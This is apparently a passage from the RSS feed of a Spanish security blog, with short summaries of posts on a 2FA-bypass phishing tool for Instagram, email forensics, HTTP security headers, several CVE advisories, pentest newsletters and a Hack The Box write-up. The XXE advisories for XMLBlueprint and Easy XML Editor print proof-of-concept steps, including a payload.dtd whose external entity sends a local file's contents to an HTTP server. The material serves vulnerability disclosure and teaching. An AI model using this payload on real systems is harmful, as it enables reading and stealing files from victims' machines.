&lt;/p&gt;</description></item><item><title>Evasión del doble factor de autenticación en Instagram</title><link>https://hackpuntes.com/es/posts/evasion-del-doble-factor-de-autenticacion-en-instagram/</link><pubDate>Sun, 19 Jan 2020 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/evasion-del-doble-factor-de-autenticacion-en-instagram/</guid><description>&lt;p&gt;El &lt;strong&gt;doble factor de autenticación&lt;/strong&gt; (2FA) es una capa adicional de seguridad para proteger las cuentas de los usuarios en diferentes servicios de Internet. Muchas personas piensan que al tener habilitada esta característica sus cuentas están completamente protegidas, pero esto no es así.&lt;/p&gt;
&lt;p&gt;Hace unos meses escribí una &lt;a href="https://hackpuntes.com/suplantacion-de-cuentas-de-gmail-con-2fa/"&gt;entrada&lt;/a&gt;
 de cómo se realizaría el proceso de ataque para evadir el &lt;strong&gt;2FA&lt;/strong&gt; en el servicio de &lt;strong&gt;Gmail&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;En este caso, he preparado una herramienta similar a &lt;a href="https://github.com/afernandezb92/2FAGmailPhising" target="_blank" rel="noopener noreferrer"&gt;2FAGmailPhishing&lt;/a&gt;
 pero para el servicio de &lt;strong&gt;Instagram&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>Seguimiento y análisis de un correo electrónico sospechoso</title><link>https://hackpuntes.com/es/posts/seguimiento-y-analisis-de-un-correo-electronico-sospechoso/</link><pubDate>Mon, 23 Dec 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/seguimiento-y-analisis-de-un-correo-electronico-sospechoso/</guid><description>&lt;p&gt;En este post vamos a intentar explicar de manera resumida cómo se puede realizar un seguimiento de un correo electrónico sospechoso (Este caso es real y se han anonimizado todos los datos).&lt;/p&gt;
&lt;p&gt;Para llevar a cabo este laboratorio, se han utilizado las siguientes herramientas:&lt;/p&gt;
&lt;p&gt;MxToolboox (Analyzer Headers)&lt;/p&gt;
&lt;p&gt;Whois&lt;/p&gt;
&lt;p&gt;Microsoft Outlook&lt;/p&gt;
&lt;p&gt;Buscadores de Internet&lt;/p&gt;
&lt;p&gt;Ahora vamos a explicar lo ocurrido.&lt;/p&gt;
&lt;p&gt;Un cliente se pone en contacto con nosotros, indicando que ha recibido un correo sospechoso, por lo que le solicitamos que envíe adjunto el correo original (formato .msg).&lt;/p&gt;</description></item><item><title>Cabeceras de seguridad HTTP</title><link>https://hackpuntes.com/es/posts/cabeceras-de-seguridad-http/</link><pubDate>Wed, 11 Dec 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cabeceras-de-seguridad-http/</guid><description>&lt;p&gt;Las &lt;strong&gt;Cabeceras HTTP&lt;/strong&gt; son parámetros que se envían en una petición o respuesta HTTP entre el cliente y el servidor para proporcionar información esencial sobre la transacción que se esté llevando a cabo. Estas cabeceras siempre utilizan la sintaxis &lt;strong&gt;«Cabecera: Valor»&lt;/strong&gt; y a continuación veremos cuales son las &lt;strong&gt;cabeceras de respuesta&lt;/strong&gt; más importantes enfocándonos en la seguridad.&lt;/p&gt;
&lt;h2 id="http-strict-transport-security-hsts"&gt;HTTP Strict Transport Security (HSTS)&lt;/h2&gt;
&lt;p&gt;Esta cabecera permite indicar a un navegador que &lt;strong&gt;siempre&lt;/strong&gt; se utilice el protocolo HTTPS para establecer la comunicación entre el cliente y servidor (en lugar de HTTP). Esto significa que cualquier marcador, enlace, recurso o dirección forzará a los usuarios a hacer uso de HTTPS, inclusive si el propio usuario especifica el uso de HTTP.&lt;/p&gt;</description></item><item><title>CVE-2019-19032 XMLBlueprint &lt;= 16.191112 - Inyección XML (XXE)</title><link>https://hackpuntes.com/es/posts/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/</link><pubDate>Mon, 25 Nov 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/</guid><description>&lt;h2 id="resumen"&gt;Resumen&lt;/h2&gt;
&lt;p&gt;Se ha detectado una vulnerabilidad de &lt;strong&gt;&lt;a href="https://www.owasp.org/index.php/XML_External_Entity_%5c%28XXE%5c%29_Processing" target="_blank" rel="noopener noreferrer"&gt;inyección XML&lt;/a&gt;
&lt;/strong&gt; (XXE) basada en entidades externas (DTD) en el software &lt;a href="https://www.xmlblueprint.com/documents/xmlblueprint-16.191112.exe" target="_blank" rel="noopener noreferrer"&gt;&lt;strong&gt;XMLBlueprint versión 16.191112&lt;/strong&gt;&lt;/a&gt;
 y posiblemente anteriores. Esta vulnerabilidad está asociada al &lt;strong&gt;&lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19032" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-19032&lt;/a&gt;
&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="impacto"&gt;Impacto&lt;/h2&gt;
&lt;p&gt;Un usuario malintencionado, podría generar un archivo XML malicioso con la intención de causar una &lt;strong&gt;denegación de servicio a la aplicación o leer archivos arbitrarios&lt;/strong&gt; del sistema.&lt;/p&gt;
&lt;h2 id="prueba-de-concepto"&gt;Prueba de concepto&lt;/h2&gt;
&lt;div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;"&gt;
&lt;iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/N6cpCPwm8ys?autoplay=0&amp;amp;controls=1&amp;amp;end=0&amp;amp;loop=0&amp;amp;mute=0&amp;amp;start=0" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" title="YouTube video"&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Iniciar un servidor web.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python -m SimpleHTTPServer 80
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="2"&gt;
&lt;li&gt;Subir el siguiente archivo &lt;strong&gt;payload.dtd&lt;/strong&gt; al servidor.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;
&amp;lt;!ENTITY % all &amp;#34;&amp;lt;!ENTITY send SYSTEM &amp;#39;http://localhost:80/?%file;&amp;#39;&amp;gt;&amp;#34;&amp;gt;
%all;
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="3"&gt;
&lt;li&gt;
&lt;p&gt;Crear un archivo de texto &lt;strong&gt;(secret.txt)&lt;/strong&gt; en el escritorio con cualquier contenido.&lt;/p&gt;</description></item><item><title>CVE-2019-19031 Easy XML Editor &lt;= 1.7.8 - Inyección XML</title><link>https://hackpuntes.com/es/posts/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/</link><pubDate>Fri, 22 Nov 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/</guid><description>&lt;h2 id="resumen"&gt;Resumen&lt;/h2&gt;
&lt;p&gt;Se ha detectado una vulnerabilidad de &lt;strong&gt;&lt;a href="https://www.owasp.org/index.php/XML_External_Entity_%5c%28XXE%5c%29_Processing" target="_blank" rel="noopener noreferrer"&gt;inyección XML&lt;/a&gt;
&lt;/strong&gt; basada en entidades externas (DTD) en el software &lt;strong&gt;&lt;a href="https://www.edit-xml.com/Easy_XML_Editor.exe" target="_blank" rel="noopener noreferrer"&gt;Easy XML Editor versión 1.7.8&lt;/a&gt;
&lt;/strong&gt; y posiblemente anteriores. Esta vulnerabilidad está asociada al &lt;strong&gt;&lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19031" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-19031&lt;/a&gt;
&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="impacto"&gt;Impacto&lt;/h2&gt;
&lt;p&gt;Un usuario malintencionado, podría generar un archivo XML malicioso con la intención de causar una &lt;strong&gt;denegación de servicio a la aplicación o leer archivos arbitrarios&lt;/strong&gt; del sistema.&lt;/p&gt;
&lt;h2 id="prueba-de-concepto"&gt;Prueba de concepto&lt;/h2&gt;
&lt;div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;"&gt;
&lt;iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/DXssm4Ll-EE?autoplay=0&amp;amp;controls=1&amp;amp;end=0&amp;amp;loop=0&amp;amp;mute=0&amp;amp;start=0" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" title="YouTube video"&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Iniciar un servidor web.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python -m SimpleHTTPServer 80
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="2"&gt;
&lt;li&gt;Subir el siguiente archivo &lt;strong&gt;payload.dtd&lt;/strong&gt; al servidor.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;
&amp;lt;!ENTITY % all &amp;#34;&amp;lt;!ENTITY send SYSTEM &amp;#39;http://localhost:80/?%file;&amp;#39;&amp;gt;&amp;#34;&amp;gt;
%all;
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="3"&gt;
&lt;li&gt;
&lt;p&gt;Crear un archivo de texto &lt;strong&gt;(secret.txt)&lt;/strong&gt; en el escritorio con cualquier contenido.&lt;/p&gt;</description></item><item><title>Hackpuntes Newsletter #3</title><link>https://hackpuntes.com/es/posts/hackpuntes-newsletter-3/</link><pubDate>Mon, 21 Oct 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackpuntes-newsletter-3/</guid><description>&lt;p&gt;Hola de nuevo, Pentesters!! Tercera entrega de esta serie de entradas, espero que os sea de ayuda. Esta newsletter cubre la semana del &lt;strong&gt;14 de octubre al 20 de octubre de 2019&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="-herramienta"&gt;🧰 Herramienta&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/internetarchive/brozzler" target="_blank" rel="noopener noreferrer"&gt;Brozzler&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Brozzler en un &lt;strong&gt;rastreador web&lt;/strong&gt; distribuido desarrollado en Python que utiliza el navegador para buscar páginas y URL con el fin de extraer enlaces. Se diferencia con otras tecnologías de rastreo al interactuar mediante el navegador real y registrar las interacciones entre los servidores web y clientes.&lt;/p&gt;</description></item><item><title>Hackpuntes Newsletter #2</title><link>https://hackpuntes.com/es/posts/hackpuntes-newsletter-2/</link><pubDate>Mon, 14 Oct 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackpuntes-newsletter-2/</guid><description>&lt;p&gt;Hola Pentesters!! Segunda entrega de esta serie de entradas, espero que os sea de ayuda. Esta newsletter cubre la semana del &lt;strong&gt;07 de octubre al 13 de octubre de 2019&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="-herramienta"&gt;🧰 Herramienta&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/vitalysim/totalrecon" target="_blank" rel="noopener noreferrer"&gt;TotalRecon&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Este &lt;strong&gt;script&lt;/strong&gt; no es una herramienta como tal, pero nos ayuda a instalar algunas de las mejores orientadas a la fase de reconocimiento.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Fast web fuzzer (ffuf)&lt;/li&gt;
&lt;li&gt;Dirsearch&lt;/li&gt;
&lt;li&gt;Findomain&lt;/li&gt;
&lt;li&gt;Httprobe&lt;/li&gt;
&lt;li&gt;Masscan&lt;/li&gt;
&lt;li&gt;Nmap&lt;/li&gt;
&lt;li&gt;Sublist3r&lt;/li&gt;
&lt;li&gt;WhatWeb&lt;/li&gt;
&lt;li&gt;Subjack&lt;/li&gt;
&lt;li&gt;Amass&lt;/li&gt;
&lt;li&gt;Waybackurls&lt;/li&gt;
&lt;li&gt;Meg&lt;/li&gt;
&lt;li&gt;GitGraber&lt;/li&gt;
&lt;li&gt;getJS&lt;/li&gt;
&lt;li&gt;LinkFinder&lt;/li&gt;
&lt;li&gt;MassDNS&lt;/li&gt;
&lt;li&gt;EyeWitness&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="-writeup"&gt;📝 Writeup&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.rahulr.in/2019/10/idor-to-rce.html" target="_blank" rel="noopener noreferrer"&gt;Referencia insegura a objeto que lleva a la ejecución de comandos&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Hackpuntes Newsletter #1</title><link>https://hackpuntes.com/es/posts/hackpuntes-newsletter-1/</link><pubDate>Mon, 07 Oct 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackpuntes-newsletter-1/</guid><description>&lt;p&gt;Bienvenidos a la primera entrega de hackpuntes newsletter, semanalmente, iremos publicando todos los &lt;strong&gt;lunes&lt;/strong&gt; recursos valiosos para pentesters y bug bounty hunters.&lt;/p&gt;
&lt;p&gt;Este newsletter cubre la semana del &lt;strong&gt;30 de septiembre al 6 de octubre de 2019&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="-herramienta"&gt;🧰 Herramienta&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/chrispetrou/HRShell" target="_blank" rel="noopener noreferrer"&gt;HRShell&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Es una &lt;strong&gt;shell reversa&lt;/strong&gt; capaz de ejecutar servidores HTTP/HTTPS con generación de certificados SSL «sobre la marcha», permite la configuración de proxy en el cliente y es fácilmente extensible. Ha sido desarrollado con Flask y es multiplataforma, muy buena herramienta para nuestras tareas de post-explotación.&lt;/p&gt;</description></item><item><title>Las 4 estaciones de Sidertia</title><link>https://hackpuntes.com/es/posts/las-4-estaciones-de-sidertia/</link><pubDate>Sun, 29 Sep 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/las-4-estaciones-de-sidertia/</guid><description>&lt;p&gt;Otoño,Invierno,Primavera,Verano…. y La Tierra completó su movimiento de traslación.&lt;/p&gt;
&lt;p&gt;return &amp;lt;-365&amp;gt; …Hola, me llamo Pedro de recursos humanos de la empresa &lt;strong&gt;&lt;a href="https://www.sidertia.com/" target="_blank" rel="noopener noreferrer"&gt;SIDERTIA&lt;/a&gt;
&lt;/strong&gt;,hemos recibido un Curriculum tuyo que nos ha parecido de interés&lt;/p&gt;
&lt;p&gt;… .. / . .-. . … / -.-. .- .–. .- –.. / -.. . / .-.. . . .-. / . … – — –..– – . / . … – .- — — … / -… ..- … -.-. .- -. -.. — / . -. / .– .– .– .-.-.- … .. -.. . .-. – .. .- .-.-.- -.-. — — .-.-.&lt;/p&gt;</description></item><item><title>CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection</title><link>https://hackpuntes.com/es/posts/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/</link><pubDate>Thu, 22 Aug 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_banner.webp" alt="CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="impacto"&gt;Impacto&lt;/h2&gt;
&lt;p&gt;Un usuario malicioso con &lt;strong&gt;permisos básicos&lt;/strong&gt; de WordPress (suscriptor) podría &lt;strong&gt;ejecutar comandos&lt;/strong&gt; en el equipo del administrador a través de &lt;strong&gt;inyecciones CSV&lt;/strong&gt; en los campos &lt;code&gt;display_name&lt;/code&gt;, &lt;code&gt;first_name&lt;/code&gt; y &lt;code&gt;last_name&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="cvss-v31-vector"&gt;CVSS v3.1 Vector&lt;/h2&gt;
&lt;p&gt;AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_001.webp" alt="CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_002.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_002.webp" alt="CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2019-14346 Adive Framework 2.0.7 - Cross-Site Request Forgery</title><link>https://hackpuntes.com/es/posts/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/</link><pubDate>Fri, 02 Aug 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/</guid><description>&lt;p&gt;Las vulnerabilidades &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%5c%28CSRF%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Request Forgery (CSRF)&lt;/a&gt;
 encontradas en Adive Framework 2.0.7 &lt;strong&gt;permiten a un usuario malintencionado realizar acciones como cambiar la contraseña de un usuario&lt;/strong&gt; a través de este ataque. La vulnerabilidad, ha sido asociada al &lt;strong&gt;CVE-2019-14346&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="cve-2019-14346"&gt;CVE-2019-14346&lt;/h2&gt;
&lt;h3 id="adive-framework-207--cross-site-request-forgery"&gt;Adive Framework 2.0.7 – Cross-Site Request Forgery&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery_001.webp" alt="CVE-2019-14346 Adive Framework 2.0.7 - Cross-Site Request Forgery" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://adive.es/" target="_blank" rel="noopener noreferrer"&gt;www.adive.es&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;📅 Vulnerabilidad descubierta por Pablo Santiago el &lt;strong&gt;02/08/2019&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;🐛 &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14346" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-14346&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🔗 Link del software &lt;a href="https://www.adive.es/" target="_blank" rel="noopener noreferrer"&gt;web&lt;/a&gt;
 y del &lt;a href="https://github.com/ferdinandmartin/adive-php7" target="_blank" rel="noopener noreferrer"&gt;github&lt;/a&gt;
 con el proyecto.&lt;/li&gt;
&lt;li&gt;🐞 Versión vulnerable = &lt;strong&gt;2.0.7&lt;/strong&gt; y anteriores probablemente.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Solución&lt;/strong&gt;: Añadir tokens anti-CSRF en las peticiones.&lt;/p&gt;</description></item><item><title>CVE-2019-14347 Escalacion de privilegios en Adive</title><link>https://hackpuntes.com/es/posts/cve-2019-14347-escalacion-de-privilegios-en-adive/</link><pubDate>Fri, 02 Aug 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-14347-escalacion-de-privilegios-en-adive/</guid><description>&lt;h2 id="adive-framework-207"&gt;Adive Framework 2.0.7&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-14347-escalacion-de-privilegios-en-adive/cve-2019-14347-escalacion-de-privilegios-en-adive_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-14347-escalacion-de-privilegios-en-adive/cve-2019-14347-escalacion-de-privilegios-en-adive_001.webp" alt="CVE-2019-14347 Escalacion de privilegios en Adive" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.adive.es/" target="_blank" rel="noopener noreferrer"&gt;https://www.adive.es/&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Adive es un Framework PHP 7 para desarrollar webs y aplicaciones en línea,administra bases de datos MySQL, es una alternativa rápida, fácil y excelente para generar plantillas teniendo así la principal estructura visual de cualquier pagina web. Esta versión incluye un kit de herramientas para desarrolladores para generar tablas, campos y entidades, formas de control y bases de datos. Adive es un ambicioso proyecto de Schben, cuyo objetivo es convertir la «codificación» en «diseño».&lt;/p&gt;</description></item><item><title>CVE 2019-14348 JoomSport - for Sports - SQL injection</title><link>https://hackpuntes.com/es/posts/cve-2019-14348-joomsport-for-sports-sql-injection/</link><pubDate>Mon, 29 Jul 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-14348-joomsport-for-sports-sql-injection/</guid><description>&lt;h2 id="joomsport-33-for-sports-team--league-football-hockey--more"&gt;JoomSport 3.3– for Sports: Team &amp;amp; League, Football, Hockey &amp;amp; more&lt;/h2&gt;
&lt;p&gt;JoomSport es un plugin de WordPress desarrollado en 2009 que ofrece características esenciales para cualquier sitio de deporte, estándares de ligas de deportes, deportes de equipo con sus respectivas descripciones, historial de partidos, estadísticas y fotos, incluyendo los enfrentamientos entre los equipos con los goles o tantos anotados por ambos equipos y detalles de los partidos.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;📅 Vulnerabilidad descubierta por Pablo Santiago el &lt;strong&gt;29/07/2019&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;🐛 &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14348" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-14348&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.exploit-db.com/exploits/47210" target="_blank" rel="noopener noreferrer"&gt;ExploitDB&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🔗 Link del software &lt;a href="https://wordpress.org/plugins/joomsport-sports-league-results-management/" target="_blank" rel="noopener noreferrer"&gt;JoomSport&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🐞 Versión vulnerable = &lt;strong&gt;3.3&lt;/strong&gt; y anteriores probablemente.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Solución&lt;/strong&gt;: Parchear la vulnerabilidad para la siguiente versión filtrando los datos de entradas introducidos por el usuario.&lt;/p&gt;</description></item><item><title>LIVING C1B3RWALL</title><link>https://hackpuntes.com/es/posts/living-c1b3rwall/</link><pubDate>Mon, 22 Jul 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/living-c1b3rwall/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/living-c1b3rwall/living-c1b3rwall_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/living-c1b3rwall/living-c1b3rwall_banner.webp" alt="LIVING C1B3RWALL" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;A primeros de Diciembre de este pasado año, me llamó la atención un twitter en el que ví algo que ponía &lt;strong&gt;C1B3RWALL&lt;/strong&gt; ,por lo que mi curiosidad hizo que me pusiera a indagar que era aquello .Quedé sorprendido por lo encontrado en el mismo: EL primer evento Nacional de &lt;strong&gt;Ciberseguridad&lt;/strong&gt; convocado por la Policía Nacional de nuestro país con la colaboración de la &lt;strong&gt;Universidad Autónoma de Madrid,&lt;/strong&gt;( Instituto de Ciencias Forenses y de la Seguridad )a realizar en el mismo vientre donde El Cuerpo engendra a todos los Policías Nacionales de España, La academia de Policía Nacional de Ávila.&lt;/p&gt;</description></item><item><title>Desplegar un servidor privado de Burp Collaborator en Azure</title><link>https://hackpuntes.com/es/posts/desplegar-un-servidor-privado-de-burp-collaborator-en-azure/</link><pubDate>Wed, 12 Jun 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/desplegar-un-servidor-privado-de-burp-collaborator-en-azure/</guid><description>&lt;p&gt;Burp Collaborator es un &lt;strong&gt;servicio externo&lt;/strong&gt; de Burp Suite que nos ayuda a detectar algunas vulnerabilidades basadas en interacciones con &lt;strong&gt;servicios externos&lt;/strong&gt; o las llamadas &lt;strong&gt;vulnerabilidades ciegas&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Por defecto, Burp Suite &lt;strong&gt;crea de manera automática&lt;/strong&gt; una instancia &lt;strong&gt;pública&lt;/strong&gt; de Collaborator en sus servidores de AWS para la realización de estas pruebas, por este motivo, algunos usuarios pueden tener &lt;strong&gt;preocupaciones sobre la seguridad de los datos procesados&lt;/strong&gt;, más aún si son de terceros. A continuación, se detallan los pasos para crear nuestro propio Burp Collaborator ayudándonos y complementando la &lt;a href="https://portswigger.net/burp/documentation/collaborator/deploying" target="_blank" rel="noopener noreferrer"&gt;documentación oficial&lt;/a&gt;
 de PortSwigger.&lt;/p&gt;</description></item><item><title>Write-up HTB Chaos</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/chaos-writeup/</link><pubDate>Sat, 25 May 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/chaos-writeup/</guid><description>&lt;p&gt;Buenas a todos,&lt;/p&gt;
&lt;p&gt;Con esta entrada vamos a comenzar una nueva serie de posts en los cuales vamos a aprender a explotar máquinas vulnerables y a resolver retos de temática hacking.&lt;/p&gt;
&lt;p&gt;En este caso vamos a comenzar con la última máquina retirada de &lt;a href="https://www.hackthebox.eu/" target="_blank" rel="noopener noreferrer"&gt;Hack The Box&lt;/a&gt;
, &lt;strong&gt;Chaos&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/write-up-htb-chaos/write-up-htb-chaos_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/write-up-htb-chaos/write-up-htb-chaos_001.webp" alt="Write-up HTB Chaos" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Para quién no conozca &lt;strong&gt;HTB&lt;/strong&gt;, es un laboratorio de pentesting que proporciona diferentes máquinas y retos para sus usuarios.  Suelo recomendar este tipo de plataformas ya que nos permiten aprender diferentes tecnologías enfrentándonos a ellas.&lt;/p&gt;</description></item><item><title>Guía sobre análisis estático de código JavaScript</title><link>https://hackpuntes.com/es/posts/guia-sobre-analisis-estatico-de-codigo-javascript/</link><pubDate>Mon, 20 May 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/guia-sobre-analisis-estatico-de-codigo-javascript/</guid><description>&lt;p&gt;&lt;strong&gt;JavaScript&lt;/strong&gt; se ha convertido en una de las tecnologías &lt;strong&gt;más utilizadas&lt;/strong&gt; de los navegadores modernos gracias a frameworks como AngularJS, ReactJS o Vue.js. Esta entrada pretende ser una guía sobre cómo encontrar y analizar todos los archivos JavaScript que contiene una aplicación web con el objetivo de detectar posibles vulnerabilidades, como en la entrada sobre &lt;a href="https://hackpuntes.com/guia-sobre-toma-de-control-de-subdominios/"&gt;toma de control de subdominios&lt;/a&gt;
, esta guía intentaré tenerla actualizada.&lt;/p&gt;
&lt;p&gt;Es esencial que entendamos la superficie de ataque de las aplicaciones y saber &lt;strong&gt;qué debemos buscar y dónde&lt;/strong&gt;. El análisis de código JavaScript es uno de ellos, por eso a continuación, se detallan una serie de puntos a seguir para detectar fallos de seguridad en el lado del cliente.&lt;/p&gt;</description></item><item><title>Smalisca: Parsing, análisis y gráficos de código Smali</title><link>https://hackpuntes.com/es/posts/smalisca-parsing-analisis-y-graficos-de-codigo-smali/</link><pubDate>Fri, 17 May 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/smalisca-parsing-analisis-y-graficos-de-codigo-smali/</guid><description>&lt;p&gt;En la entrada de hoy, vamos a mostrar la herramienta &lt;a href="https://github.com/dorneanu/smalisca" target="_blank" rel="noopener noreferrer"&gt;Smalisca&lt;/a&gt;
